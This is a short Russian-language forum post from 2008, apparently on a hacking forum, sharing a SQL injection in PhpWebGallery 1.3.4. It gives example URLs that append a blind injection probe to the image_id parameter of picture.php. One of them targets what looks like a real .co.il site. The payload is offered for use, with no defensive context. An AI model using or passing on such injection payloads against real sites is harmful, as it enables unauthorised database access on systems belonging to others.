Тема: PhpWebGallery
Показать сообщение отдельно

  #5  
Старый 14.09.2008, 22:55
Mo4x
Постоянный
Регистрация: 18.02.2007
Сообщений: 416
Провел на форуме:
3509350

Репутация: 412
По умолчанию

-PhpWebGallery 1.3.4 sql injection

язвимость находится в параметре "cat" сценарием picture .

Цитата:
site.co.il/phpwebgallery/picture.php?cat=[Real id]&image_id= [Real id]+and+substring(@@version,1,1)=5
site.co.il/phpwebgallery/picture.php?cat=3&image_id=76+and+substring(@@vers ion,1,1)=5
(c)-Насчет копирайтов ей богу непомню где взял .
 
Ответить с цитированием